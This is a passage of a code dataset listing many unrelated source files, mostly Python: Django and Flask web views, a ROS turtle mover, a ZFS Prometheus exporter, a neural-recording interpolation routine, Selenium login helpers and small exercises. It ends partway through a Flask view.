text stringlengths 8 6.05M |
|---|
from django.shortcuts import render, redirect
from .filters import PupilFilter
from .forms import PupilForm, ClassroomForm, BahoForm
from .models import Classroom, Pupil, Baho
from django.core.paginator import Paginator
from django.views.generic import DetailView, ListView
class PupilListView(ListView):
model = Pupil
template_name = 'urok/Pupil_list.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['filter'] = PupilFilter(self.request.GET, queryset=self.get_queryset())
return context
def index(request):
return render(request, 'urok/index.html')
def pupil(request):
if request.method == "POST":
form = PupilForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
form = PupilForm()
return render(request, 'urok/pupil.html', {'form': form})
def baho(request):
if request.method == "POST":
form = BahoForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
form = BahoForm()
return render(request, 'urok/baho.html', {'form': form})
def classroom(request):
if request.method == "POST":
form = ClassroomForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
form = ClassroomForm()
return render(request, 'urok/classroom.html', {'form': form})
def royxat(request):
form = Pupil.objects.all()
return render(request, 'urok/royxat.html', {'forms': form })
def sinflar(request):
sinfi = Classroom.objects.all()
links = Pupil
return render(request, 'urok/sinflar.html', {'sinfi': sinfi, 'links': links})
class Oquch(DetailView):
model = Pupil
template_name = 'urok/oquch.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['bahos'] = Baho.objects.all()
return context
def category(request, gradue_id):
page = request.GET.get('page')
categ = Classroom.objects.get(pk=gradue_id)
all_topics = Pupil.objects.filter(gradue=categ)
paginator = Paginator(all_topics, 10)
topics = paginator.get_page(page)
bahos = Classroom.objects.all()
forms = Baho.objects.all()
return render(request, 'urok/category.html', {'topics': topics, 'bahos': bahos, 'forms': forms})
|
from Model.Point import Point
class Segmento:
seccion = [Point(), Point()]
especularidad = False
transparencia = False
lado=""
def __init__(self, espec=False, puntos=[Point(), Point()], trans=False):
self.especularidad = espec
self.seccion = puntos
self.transparencia = trans
def setEspecularidad(self, cambioEspec):
self.especularidad = cambioEspec
def getEspecularidad(self):
return self.especularidad
def getSeccion(self):
return self.seccion
|
# import dependencies
from flask import Flask, jsonify, render_template
from accidentsdata import read_accidents, read_accidents_severity,\
read_accidents_severity,read_accidents_state, read_accidents_zipcode,read_accidents_all
app = Flask(__name__)
#Define flask routes
@app.route('/') ##route to render index.html in heroku
def index():
return "<h3>Welcome to Team 8 Project 2 Server!!</h3>"
# return render_template('index.html')
@app.route('/api/info') #all available APIs
def available_apis():
return(
f'<h4>Available API Routes:</h4>'
f'<a href="/allaccidents">/allaccidents</a><br/>'
f'<a href="/accidents" target="_blank">/accidents</a><br/>'
f'<a href="/accidents/4" target="_blank">/accidents/min_severity</a><br/>'
f'<a href="/states/TX" target="_blank">/states/state</a><br/>'
f'<a href="/zipcode/77071" target="_blank">/zipcode/zipcode</a><br/>'
)
@app.route('/allaccidents') #not a good idea to call the all accidents api, 540K documents
def get_all_ccidents():
accidents = read_accidents_all()
return jsonify(accidents)
@app.route('/accidents') # return all accidents, but limited to 5000k documents
def get_accidents():
accidents = read_accidents()
return jsonify(accidents)
@app.route('/accidents/<min_severity>') #return accidents severity on a scale of 1-4
def get_accidents_severity(min_severity):
accidents = read_accidents_severity(min_severity)
return jsonify(accidents)
@app.route('/states/<state>') #filter to specific state
def get_accidents_state(state):
accidents = read_accidents_state(state)
return jsonify(accidents)
@app.route('/zipcode/<zipcode>') #filter to specific zipcode
def get_accidents_zipcode(zipcode):
accidents = read_accidents_zipcode(zipcode)
return jsonify(accidents)
if __name__ == '__main__':
app.run(debug=True)
# print(read_accidents())
# print(read_accidents_severity(2))
|
from oscpy.server import OSCThreadServer
from time import sleep
def callback(*values):
print("got values: {}".format(values))
osc = OSCThreadServer()
sock = osc.listen(address='0.0.0.0', port=8000, default=True)
osc.bind(b'/send_i', callback)
sleep(1000)
osc.stop()
|
#!/usr/bin/python
#
# Move_Turtle.py
#
# Created on: Nov 9, 2016
# Author: Elad Israel 313448888
#
import sys, rospy
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
#determines whether location should be displayed or not
shouldDisplay=True
def pose_callback(pose_msg):
global shouldDisplay
if shouldDisplay==True:
rospy.loginfo("x: %.2f, y: %.2f" % (pose_msg.x, pose_msg.y))
shouldDisplay=False
if __name__ == "__main__":
FORWARD_SPEED_MPS = 1
count=1
robot_name = sys.argv[1]
# Initialize the node
rospy.init_node("move_turtle")
# A publisher for the movement data
pub = rospy.Publisher(robot_name+"/cmd_vel", Twist, queue_size=10)
# A listener for pose
sub = rospy.Subscriber(robot_name+"/pose", Pose, pose_callback)
# Drive forward at a given speed. The robot points up the x-axis.
# The default constructor will set all commands to 0
msg = Twist()
msg.linear.x = FORWARD_SPEED_MPS
# Loop at 10Hz, publishing movement commands until we shut down
rate = rospy.Rate(10)
while not rospy.is_shutdown():
#move forward 14 steps
if count<15:
pub.publish(msg)
rate.sleep()
#rotate after moving forward
elif count==16:
#dont move forward
msg.linear.x =0
msg.angular.z= 0.5
pub.publish(msg)
rate.sleep()
#display last location
shouldDisplay=True
count+=1
|
# Generated by Django 3.0.8 on 2020-11-28 06:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('facilitators', '0003_auto_20201118_1849'),
]
operations = [
migrations.RemoveField(
model_name='facilitatorqueries',
name='status',
),
migrations.AddField(
model_name='facilitatorqueries',
name='added',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='facilitatorqueries',
name='replay',
field=models.CharField(default='Doubt', max_length=250),
),
migrations.AddField(
model_name='facilitatorqueries',
name='updated',
field=models.DateTimeField(auto_now=True, null=True),
),
]
|
import shutil
import os
import re
from collections import defaultdict
def read_file_path(folder):
file_dict = defaultdict(list)
for subject_name in os.listdir(folder):
for img_name in os.listdir(folder + "/" + subject_name + "/"):
img_no = img_name[:img_name.rindex(".")]
file_dict[subject_name].append(img_no)
return file_dict
if __name__ == "__main__":
left_dict = read_file_path("/home/machen/dataset/DISFA/Img_LeftCamera")
right_dict = read_file_path("/home/machen/dataset/DISFA/Img_RightCamera")
new_dir = "/home/machen/dataset/DISFA/new_of/"
pattern = re.compile("(.*?)Video(SN.*?)_.*")
of_left = defaultdict(list)
of_right = defaultdict(list)
for dir_name in os.listdir("/home/machen/dataset/DISFA/optical_flow"):
seq_ma = pattern.match(dir_name)
seq_key = seq_ma.group(2)
left_right = seq_ma.group(1)
of_dict = of_left
if left_right == "Right":
of_dict = of_right
for of_path in os.listdir("/home/machen/dataset/DISFA/optical_flow/" + dir_name):
of_no = of_path[:of_path.rindex(".")]
of_dict[seq_key].append(of_no)
for img_dict in [left_dict, right_dict]:
if img_dict == left_dict:
continue
of_dict = of_left
if img_dict == right_dict:
of_dict = of_right
for seq_key, img_list in img_dict.items():
of_list = of_dict[seq_key]
img_list = sorted(img_list, key=lambda e:int(e))
of_list = sorted(of_list, key=lambda e:int(e))
if len(img_list) - 1 != len(of_list):
print(len(img_list) - 1, len(of_list))
# assert len(left_list) - 1 == len(left_of_list), seq_key
for idx, img_orig in enumerate(img_list):
if idx >= len(of_list):
idx = len(of_list) - 1
src_no = of_list[idx]
target_keystr = "Img_LeftCamera"
keystr = "LeftVideo"
if img_dict == right_dict:
keystr = "RightVideo"
target_keystr = "Img_RightCamera"
src_path = "/home/machen/dataset/DISFA/optical_flow/{}".format(keystr) + seq_key+"_comp/" + src_no + ".jpg"
target_path = new_dir + target_keystr +"/" + seq_key + "/" + img_orig + ".jpg"
# os.makedirs(os.path.dirname(target_path), exist_ok=True)
# shutil.copyfile(src_path, target_path)
print(" move {0} to {1}".format(src_path, target_path))
|
import sys
import re
import logging
def run_calc(calc_str):
res = 0
err = ''
print('run_calc: ', calc_str)
calc_str_clean = calc_str.replace(' ', '')
add_parts = calc_str_clean.split('+')
for i in range(len(add_parts)):
print('add_part: ', add_parts[1])
if '-' in add_parts[i]:
subtract_list = add_parts[i].split('-')
for j in range(len(subtract_list)):
subtract_list[j] = precalculate(subtract_list[j])
print(subtract_list)
add_parts[i] = subtract_list[0] - sum(subtract_list[1:])
print(add_parts[i])
print(add_parts)
res = sum(map(float, add_parts))
return res, err
def precalculate(str):
res_str = float(str)
return res_str
if __name__ == '__main__':
exit_flag = '1'
while exit_flag == '1':
calc_str = input('что посчитать?')
if calc_str[-1] != '=':
print('в конце должнен быть знак "="!')
else:
calc_str = '10+2 8*2 +35/5 - 1 +14='
calc_str = '13+14-1-7 + 9='
(res, err) = run_calc(calc_str[:-1])
exit_flag = err
if not err:
print('Результат: ', str(res))
else:
print('Error: ', err)
|
import numpy as np
import scipy.spatial
def get_spatial_interpolation_kernel(source_location, target_location, method='kriging',
sigma_um=20., p=1, num_closest=3, dtype='float32',
force_extrapolate=False):
"""
Compute the spatial kernel for linear spatial interpolation.
This is used for interpolation of bad channels or to correct the drift
by interpolating between contacts.
For reference, here is a simple overview on spatial interpolation:
https://www.aspexit.com/spatial-data-interpolation-tin-idw-kriging-block-kriging-co-kriging-what-are-the-differences/
Parameters
----------
source_location: array shape (m, 2)
The recording extractor to be transformed
target_location: array shape (n, 2)
Scale for the output distribution
method: 'kriging' or 'idw' or 'nearest'
Choice of the method
'kriging' : the same one used in kilosort
'idw' : inverse distance weithed
'nearest' : use nereast channel
sigma_um : float (default 20.)
Used in the 'kriging' formula
p: int (default 1)
Used in the 'kriging' formula
num_closest: int (default 3)
Used for 'idw'
force_extrapolate: bool (false by default)
How to handle when target location are outside source location.
When False : no extrapolation all target location outside are set to zero.
When True : extrapolation done with the formula of the method.
In that case the sum of the kernel is not force to be 1.
Returns
-------
interpolation_kernel: array (m, n)
"""
target_is_inside = np.ones(target_location.shape[0], dtype=bool)
for dim in range(source_location.shape[1]):
l0, l1 = np.min(source_location[:, dim]), np.max(source_location[:, dim])
target_is_inside &= (target_location[:, dim] >= l0) & (target_location[:, dim] <= l1)
if method == 'kriging':
# this is an adaptation of the pykilosort implementation by Kush Benga
# https://github.com/int-brain-lab/pykilosort/blob/ibl_prod/pykilosort/datashift2.py#L352
Kxx = get_kriging_kernel_distance(source_location, source_location, sigma_um, p)
Kyx = get_kriging_kernel_distance(target_location, source_location, sigma_um, p)
interpolation_kernel = Kyx @ np.linalg.pinv(Kxx + 0.01 * np.eye(Kxx.shape[0]))
interpolation_kernel = interpolation_kernel.T.copy()
# sparsify
interpolation_kernel[interpolation_kernel < 0.001] = 0.
# ensure sum = 1 for target inside
s = np.sum(interpolation_kernel, axis=0)
interpolation_kernel[:, target_is_inside] /= s[target_is_inside].reshape(1, -1)
elif method == 'idw':
distances = scipy.spatial.distance.cdist(source_location, target_location, metric='euclidean')
interpolation_kernel = np.zeros((source_location.shape[0], target_location.shape[0]), dtype='float64')
for c in range(target_location.shape[0]):
ind_sorted = np.argsort(distances[:, c])
chan_closest = ind_sorted[:num_closest]
dists = distances[chan_closest, c]
if dists[0] == 0.:
# no interpolation the first have zeros distance
interpolation_kernel[chan_closest[0], c] = 1.
else:
interpolation_kernel[chan_closest, c] = 1 / dists
# ensure sum = 1 for target inside
s = np.sum(interpolation_kernel, axis=0)
interpolation_kernel[:, target_is_inside] /= s[target_is_inside].reshape(1, -1)
elif method == 'nearest':
distances = scipy.spatial.distance.cdist(source_location, target_location, metric='euclidean')
interpolation_kernel = np.zeros((source_location.shape[0], target_location.shape[0]), dtype='float64')
for c in range(target_location.shape[0]):
ind_closest = np.argmin(distances[:, c])
interpolation_kernel[ind_closest, c] = 1.
else:
raise ValueError('get_interpolation_kernel wrong method')
if not force_extrapolate:
interpolation_kernel[:, ~target_is_inside] = 0
return interpolation_kernel.astype(dtype)
def get_kriging_kernel_distance(locations_1, locations_2, sigma_um, p):
"""
Get the kriging kernel between two sets of locations.
Parameters
----------
locations_1 / locations_2 : 2D np.array
Locations of shape (N, D) where N is number of
channels and d is spatial dimension (e.g. 2 for [x, y])
sigma_um : float
Scale paremter on the Gaussian kernel,
typically distance between contacts in micrometers.
p : float
Weight parameter on the exponential function. Default
in IBL kriging interpolation is 1.3.
Results
----------
kernal_dist : n x m array (i.e. locations 1 x locations 2) of
distances (gaussian kernel) between locations 1 and 2.
"""
dist = scipy.spatial.distance.cdist(locations_1, locations_2, metric='euclidean')
kernal_dist = np.exp(-(dist / sigma_um) ** p)
return kernal_dist
def get_kriging_channel_weights(contact_positions1, contact_positions2, sigma_um, p,
weight_threshold=0.005):
"""
Calculate weights for kriging interpolation. Weights below weight_threshold are set to 0.
Based on the interpolate_bad_channels() function of the International Brain Laboratory.
International Brain Laboratory et al. (2022). Spike sorting pipeline for the
International Brain Laboratory. https://www.internationalbrainlab.com/repro-ephys
"""
weights = get_kriging_kernel_distance(contact_positions1,
contact_positions2,
sigma_um,
p)
weights[weights < weight_threshold] = 0
with np.errstate(divide='ignore', invalid='ignore'):
weights /= np.sum(weights, axis=0)[None, :]
weights[np.logical_or(weights < weight_threshold,
np.isnan(weights))] = 0
return weights
|
from jaeger_client import Config
from opentracing.scope_managers.asyncio import AsyncioScopeManager
def initialize_tracing_client(
service_name,
reporting_host='localhost',
reporting_port='6831'
):
config = Config(
config={
'sampler': {'type': 'const', 'param': 1},
'local_agent': {'reporting_host': reporting_host, 'reporting_port': reporting_port},
},
service_name=service_name,
validate=True,
scope_manager=AsyncioScopeManager()
)
return config.initialize_tracer()
|
from selenium import webdriver
import unittest
from time import sleep,ctime
def login_regular(driver,phone="18583965785"):
driver.find_element_by_id("loginBtn-text").click()
driver.switch_to.frame("indexFrame")
driver.find_element_by_id("js-phone-num").clear()
driver.find_element_by_id("js-code-val").clear()
driver.find_element_by_id("js-phone-num").send_keys(phone)
driver.find_element_by_id("js-get-code").click()
sleep(1)
driver.switch_to.default_content()
text = driver.find_element_by_xpath("/html/body/div[3]/div/div/div[3]/p").text
driver.switch_to_frame("indexFrame")
driver.find_element_by_id("js-code-val").send_keys(text)
driver.find_element_by_id("js-login-event").click()
sleep(10)
def login_test(driver,phone="12055116631"):
driver.find_element_by_id("loginBtn-text").click()
driver.switch_to.frame("indexFrame")
driver.find_element_by_id("js-phone-num").clear()
driver.find_element_by_id("js-code-val").clear()
driver.find_element_by_id("js-phone-num").send_keys(phone)
driver.find_element_by_id("js-get-code").click()
sleep(1)
driver.find_element_by_id("js-login-event").click()
sleep(10) |
#! /user/bin/env python
# _*_ coding: utf-8 _*_
# __author__ = "王顶"
# Email: 408542507@qq.com
"""
循环切片实现
需求总是改变,一会是4层金字塔,一会儿是5层金子塔
到底要几层,改一下 while 循环的条件变量就行了
"""
level = 0
line = ''
stars = '*******************************************'
spaces = ' '
while level < 4:
n = level * 2 + 1 # n 代表* 的个数
m = 4 - level # m 代表空格个数
line = spaces[:m] + stars[:n]
print(line)
level = level + 1 |
from dataclasses import dataclass
from typing import Union
from rdflib import OWL, Graph
from rdflib.term import Node, BNode
from funowl.base.cast_function import exclude
from funowl.base.fun_owl_choice import FunOwlChoice
from funowl.identifiers import IRI
from funowl.writers import FunctionalWriter
@dataclass
class ObjectProperty(IRI):
rdf_type = OWL.ObjectProperty
@dataclass
class ObjectInverseOf(FunOwlChoice):
v: Union[ObjectProperty, str] = exclude([str])
def to_functional(self, w: FunctionalWriter) -> FunctionalWriter:
return w.func(self, lambda: w + self.v)
def to_rdf(self, g: Graph, emit_type_arc: bool = False) -> Node:
x = BNode()
assert isinstance(self.v, ObjectProperty)
g.add((x, OWL.inverseOf, self.v.to_rdf(g)))
return x
@dataclass
class ObjectPropertyExpression(FunOwlChoice):
# The order below is important
v: Union[ObjectProperty, ObjectInverseOf, str] = exclude([str])
|
a=1
A=2
A1=3
#2b=4
print(a, A, A1)
'''
변수명 정하기
1) 영문과 숫자, _로 이루어진다.
2) 대소문자를 구분한다.
3) 문자나, _ 로 시작한다.
4) 특수문자를 사용하면 안된다.
'''
a,b,c = 3,2,1
print(a,b,c)
#값 교환 - 프로그래밍에서 많이씀
a,b = 10, 20
print(a,b)
a,b = b,a
print(a,b)
#변수 타입
a = 123456782569871598715
print(a)
a=12.123456789123456789
print(a) # 8byte 용량까지만 출력이 됨
a = "student"
print(a)
#출력방식
print("number")
a,b,c = 1,2,3
print(a,b,c)
print("number : ", a,b,c)
print(a,b,c, sep=',')
print(a,b,c, sep='')
print(a,b,c, sep='\n')
print(a, end = ' ')
print(b, end = ' ')
print(c)
|
#!/usr/bin/python3
from typing import List, Tuple
from enum import Enum, auto
import argparse
from zpool_parser import get_zpool_status, ZPoolState, DriveStatus, SubpoolType, SubpoolStatus, ZPoolStatus
def export_zfs_text(pool_data: List[ZPoolStatus]):
return export_zfs_pool_health(pool_data) \
+ export_zfs_drive_health(pool_data) \
+ export_zfs_resilver_status(pool_data) \
+ export_zfs_resilver_time(pool_data) \
+ export_zfs_resilver_last_time(pool_data) \
+ export_zfs_scrub_status(pool_data) \
+ export_zfs_scrub_time(pool_data) \
+ export_zfs_scrub_last_time(pool_data)
def export_zfs_pool_health(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Pool_Health: 0=healthy, 1=degraded\n"
"# TYPE ZFS_Pool_Health gauge\n")
for pool in pool_data:
export += "ZFS_Pool_Health{{pool=\"{0}\"}} {1}\n".format(
pool.name, pool.state.value)
return export + "\n"
def export_zfs_drive_health(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Drive_Health: 0=healthy, 1=degraded, 2=unavail\n"
"# TYPE ZFS_Drive_Health gauge\n")
for pool in pool_data:
for subpool in pool.subpools:
for drive in subpool.drives:
export += "ZFS_Drive_Health{{pool=\"{0}\", name=\"{1}\"}} {2}\n".format(
pool.name, drive.name, drive.state.value)
return export + "\n"
def export_zfs_resilver_status(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Resilver_Status: 0=not resilvering, 1=resilvering\n"
"# TYPE ZFS_Resilver_Status gauge\n")
for pool in pool_data:
export += "ZFS_Resilver_Status{{pool=\"{0}\"}} {1}\n".format(
pool.name, 1 if pool.currently_resilvering else 0)
return export + "\n"
def export_zfs_resilver_time(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Resilver_Time_Remaining: time in seconds\n"
"# TYPE ZFS_Resilver_Time_Remaining gauge\n")
for pool in pool_data:
export += "ZFS_Resilver_Time_Remaining{{pool=\"{0}\"}} {1}\n".format(
pool.name, pool.resilver_time_remaining)
return export + "\n"
def export_zfs_resilver_last_time(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Resilver_Last_Time: time since epoch\n"
"# TYPE ZFS_Resilver_Last_Time gauge\n")
for pool in pool_data:
export += "ZFS_Resilver_Last_Time{{pool=\"{0}\"}} {1}\n".format(
pool.name, pool.last_resilver)
return export + "\n"
def export_zfs_scrub_status(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Scrub_Status: 0=not scrubbing, 1=scrubbing\n"
"# TYPE ZFS_Scrub_Status gauge\n")
for pool in pool_data:
export += "ZFS_Scrub_Status{{pool=\"{0}\"}} {1}\n".format(
pool.name, 1 if pool.currently_scrubbing else 0)
return export + "\n"
def export_zfs_scrub_time(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Scrub_Time_Remaining: time in seconds\n"
"# TYPE ZFS_Scrub_Time_Remaining gauge\n")
for pool in pool_data:
export += "ZFS_Scrub_Time_Remaining{{pool=\"{0}\"}} {1}\n".format(
pool.name, pool.scrub_time_remaining)
return export + "\n"
def export_zfs_scrub_last_time(pool_data: List[ZPoolStatus]) -> str:
export = ("# HELP ZFS_Scrub_Last_Time: time since epoch\n"
"# TYPE ZFS_Scrub_Last_Time gauge\n")
for pool in pool_data:
export += "ZFS_Scrub_Last_Time{{pool=\"{0}\"}} {1}\n".format(
pool.name, pool.last_scrub)
return export + "\n"
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Generate Prometheus formatted list.")
parser.add_argument("-o", "--output-file", type=str, help="path + filename to output to")
args = parser.parse_args()
# print(args)
if args.output_file:
with open(args.output_file, "w") as f:
f.write(export_zfs_text(get_zpool_status()))
else:
print(export_zfs_text(get_zpool_status()))
|
from .utils import sendMail
MAIL_DEFAULTS = {
"SHARED_WITH_ME": {
"title": "{sender_name} has shared {resource_name} with you",
"body": "Hi {recepient_name},\n Kindly use this link below to access {resource_url}"
}
}
def send_mail(type, user_list, title_kwargs, body_kwargs):
for user in user_list:
title = MAIL_DEFAULTS[type]["title"].format(**title_kwargs)
body_kwargs = {**body_kwargs,
"recepient_name": user["first_name"]
}
body = MAIL_DEFAULTS[type]["body"].format(**body_kwargs)
sendMail(title, body, [user["email"]])
def sync_send_mail(type, user_list, title_kwargs, body_kwargs):
for user in user_list:
title = MAIL_DEFAULTS[type]["title"].format(**title_kwargs)
body_kwargs = {**body_kwargs,
"recepient_name": user["first_name"]
}
body = MAIL_DEFAULTS[type]["body"].format(**body_kwargs)
sendMail(title, body, [user["email"]])
|
from rest_framework import permissions, viewsets
from rest_framework.decorators import api_view, permission_classes, authentication_classes
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .serializers import QuestionaireSerializer, QuestionaireStatusSerializer, QuestionTypeSerializer, QuestionSerializer, ResponseSerializer
from .models import Questionaire, QuestionaireStatus, QuestionType, Question, RadioChoice, Response as Res, ResponseItem
from django.contrib.auth.models import User
from rest_framework.status import (
HTTP_400_BAD_REQUEST,
HTTP_404_NOT_FOUND,
HTTP_200_OK
)
import json
# Create your views here.
def index(request):
return HttpResponse("Create a questionaire here")
@permission_classes([permissions.IsAuthenticatedOrReadOnly,])
class questionaireViewset(viewsets.ModelViewSet):
queryset = Questionaire.objects.all()
serializer_class = QuestionaireSerializer
def get_queryset(self):
queryset = self.queryset
if self.request.user.is_authenticated:
queryset=queryset.filter(user=self.request.user)
else:
queryset=queryset.filter(status_id=2)
return queryset
class questionaireStatusViewSet(viewsets.ReadOnlyModelViewSet):
queryset = QuestionaireStatus.objects.all()
serializer_class = QuestionaireStatusSerializer
class questionTypeViewSet(viewsets.ReadOnlyModelViewSet):
queryset = QuestionType.objects.all()
serializer_class = QuestionTypeSerializer
@permission_classes([permissions.IsAuthenticatedOrReadOnly,])
class questionViewSet(viewsets.ReadOnlyModelViewSet):
queryset = Question.objects.all()
serializer_class = QuestionSerializer
def get_queryset(self):
queryset = self.queryset
questionaireId = self.request.query_params.get('questionaireId', None)
if questionaireId:
queryset=queryset.filter(questionaire_id=questionaireId).order_by('order', 'type')
return queryset
class responseViewSet(viewsets.ReadOnlyModelViewSet):
queryset = Res.objects.all()
serializer_class = ResponseSerializer
def get_queryset(self):
queryset = self.queryset
questionaireId = self.request.query_params.get('questionaireId', None)
if questionaireId:
queryset=queryset.filter(questionaire_id=questionaireId).order_by('created')
return queryset
@api_view(["POST"])
def questionaireSave(request):
retVal = {'result': 'success'}
received_q = json.loads(request.body)
model_status = QuestionaireStatus.objects.get(id=received_q['status'])
if int(received_q['id']) < 0:
# create
# save questionaire
model_q = Questionaire(user=request.user, status=model_status, title=received_q['title'], description=received_q['description'])
model_q.save()
else:
# update
model_q = Questionaire.objects.get(id=received_q['id'])
model_q.user = request.user
model_q.status = model_status
model_q.title = received_q['title']
model_q.description = received_q['description']
model_q.save()
#delete old questions
oldQues = Question.objects.filter(questionaire=model_q)
for q in oldQues:
oldRadios = RadioChoice.objects.filter(question=q)
for r in oldRadios:
r.delete()
q.delete()
#save questions
for question in received_q['questions']:
model_type = QuestionType.objects.get(id=question['type'])
model_ques = Question(questionaire=model_q, type=model_type, text=question['text'], order=question['order'])
model_ques.save()
if question['radioChoices']:
for rc in question['radioChoices']:
model_rc = RadioChoice(question=model_ques, text=rc['text'])
model_rc.save()
return Response(retVal, status=HTTP_200_OK)
@csrf_exempt
@api_view(["POST"])
@permission_classes([permissions.AllowAny,])
@authentication_classes([])
def responseSubmit(request):
retVal = {'result': 'success'}
received_r = json.loads(request.body)
#save response
model_q = Questionaire.objects.get(id=received_r['questionaireId'])
model_r = Res(questionaire=model_q)
model_r.save()
#save responseItems
for item in received_r['items']:
model_ques = Question(id=item['quesId'])
model_item = ResponseItem(response=model_r, question=model_ques, text=item['text'], checkbox=item['checkbox'])
if item['radio']:
model_radio = RadioChoice(id=item['radio'])
model_item.radio = model_radio
model_item.save()
return Response(retVal, status=HTTP_200_OK)
|
# Generated by Django 2.0.2 on 2018-03-07 12:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0020_auto_20180307_1042'),
]
operations = [
migrations.AddField(
model_name='article',
name='author_name',
field=models.CharField(blank=True, max_length=225),
),
]
|
import lstm as net
import utils
import json
import argparse
import torch
import data_loader
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--data_set', default='val', choices=['train', 'val', 'test'],
help='The data set you want to evaluate')
arg_parser.add_argument('--model', default='bilstm_mlp_elmo.pt', help='Model name')
if __name__ == '__main__':
args = arg_parser.parse_args()
data_set = args.data_set
model = args.model
params = utils.Params('data/balanced/dataset_params.json')
params.update('experiments/elmo_model/params.json')
dl = data_loader.DataLoader('data/averaged_elmo/', params)
data = dl.load_elmo_data([data_set], 'data/averaged_elmo')
net = net.Network(params)
net.load_state_dict(torch.load(model))
# Evaluation
val_data_iter = dl.elmo_iterator(data[data_set], params, shuffle=False)
total_correct = 0
predictions = torch.tensor([], dtype=torch.long)
true_labels = torch.tensor([], dtype=torch.long)
for batch in val_data_iter:
sents, labels = batch
preds, single_labels = net(sents, labels)
total_correct += net.get_num_correct(preds, single_labels)
preds = torch.argmax(preds, dim=1)
predictions = torch.cat((predictions, preds),dim=0)
true_labels = torch.cat((true_labels, single_labels), dim=0)
num_instances = len(predictions)
print("#### EVALUATION RESULTS ####")
print("Number of instances: ", num_instances)
print("total_correct: ", total_correct)
print(confusion_matrix(true_labels, predictions))
print(precision_recall_fscore_support(true_labels, predictions, average='weighted')) |
class Worker(object):
"""Базовый класс"""
def __init__(self, name, surname, position, income):
self.name = name
self.surname = surname
self.position = position
self.__income = {'wage': income[0], 'bonus': income[1]}
class Position(Worker):
def get_full_name(self):
return ' '.join([self.name, self.surname])
def get_total_income(self):
return sum(self._Worker__income.values())
def do():
pos = Position('John', 'Smith', 'Killer', [100000, 10000])
print(f'Рабочий {pos.get_full_name()} '
f'работает на должности {pos.position} '
f'и получает суммарно {pos.get_total_income()}')
if __name__ == '__main__':
do()
|
from Circle import Circle
from Rectangle import Rectangle
def main():
circle = Circle(1.5)
print("A Circle", circle)
r = Rectangle(2, 4)
print("A rectangle ", r)
main() |
from fysql import Table
from fypress import FyPress
fypress = FyPress()
class FyPressTables(Table):
db = fypress.database.db
|
class Solution:
def canJump(self, nums):
maximum_distance = 0
for i, num in enumerate(nums):
if i > maximum_distance:
return False
maximum_distance = max(maximum_distance, i + num)
return True
|
from django.test import TestCase, tag
from django.contrib.auth.models import User
from apps.library.models import Book
class LibraryTestCase(TestCase):
list_url = '/library/'
detail_url = '/library/book/{id}/'
create_url = '/library/book/add/'
@classmethod
def setUpTestData(cls):
admin_credentials = {
'email': 'admin@localhost.ru',
'username': 'admin',
'password': '123456'
}
user_credentials = {
'email': 'user@localhost.ru',
'username': 'user',
'password': '123456'
}
cls.admin = User.objects.create_superuser(**admin_credentials)
cls.user = User.objects.create_user(**user_credentials)
cls.book = Book.objects.create(
title='Book title',
description='Description',
year=2018,
url='http://example.com/book/1/',
size=2.5,
)
@tag('list', 'anonymous')
def test_view_book_list_by_anonymous(self):
response = self.client.get(self.list_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.book.id, response.context_data['book_list'][0].id)
self.assertEqual(self.book.title, response.context_data['book_list'][0].title)
self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))
@tag('list', 'user')
def test_view_book_list_by_user(self):
self.client.force_login(self.user)
response = self.client.get(self.list_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.book.id, response.context_data['book_list'][0].id)
self.assertEqual(self.book.title, response.context_data['book_list'][0].title)
self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))
@tag('list', 'admin')
def test_view_book_list_by_admin(self):
self.client.force_login(self.user)
response = self.client.get(self.list_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.book.id, response.context_data['book_list'][0].id)
self.assertEqual(self.book.title, response.context_data['book_list'][0].title)
self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))
def test_book_list_filtered_by_anonymous(self):
response = self.client.get(self.list_url, {'title': 'Book'})
self.assertEqual(response.status_code, 200)
self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))
def test_book_list_case_insensitive_filtered_by_anonymous(self):
response = self.client.get(self.list_url, {'title': 'book'})
self.assertEqual(response.status_code, 200)
self.assertEqual(Book.objects.count(), len(response.context_data['book_list']))
|
from datetime import datetime
from flask import render_template, flash, redirect, url_for, request, g, \
jsonify, current_app
from flask_login import current_user, login_required
from flask_babel import _, get_locale
from guess_language import guess_language
from app import db
from app.main.forms import EditProfileForm, PostForm, SearchForm, PostRateForm, SearchRatesForm, LocationReviewForm, MessageForm
from app.models import User, Post, Rate, LocationReview, City, Message, Notification
from app.translate import translate
from app.main import bp
@bp.before_app_request
def before_request():
if current_user.is_authenticated:
current_user.last_seen = datetime.utcnow()
db.session.commit()
g.search_form = SearchForm()
g.locale = str(get_locale())
@bp.route('/', methods=['GET', 'POST'])
@bp.route('/index', methods=['GET', 'POST'])
@login_required
def index():
form = PostForm()
if form.validate_on_submit():
language = guess_language(form.post.data)
if language == 'UNKNOWN' or len(language) > 5:
language = ''
post = Post(body=form.post.data, author=current_user,
language=language)
db.session.add(post)
db.session.commit()
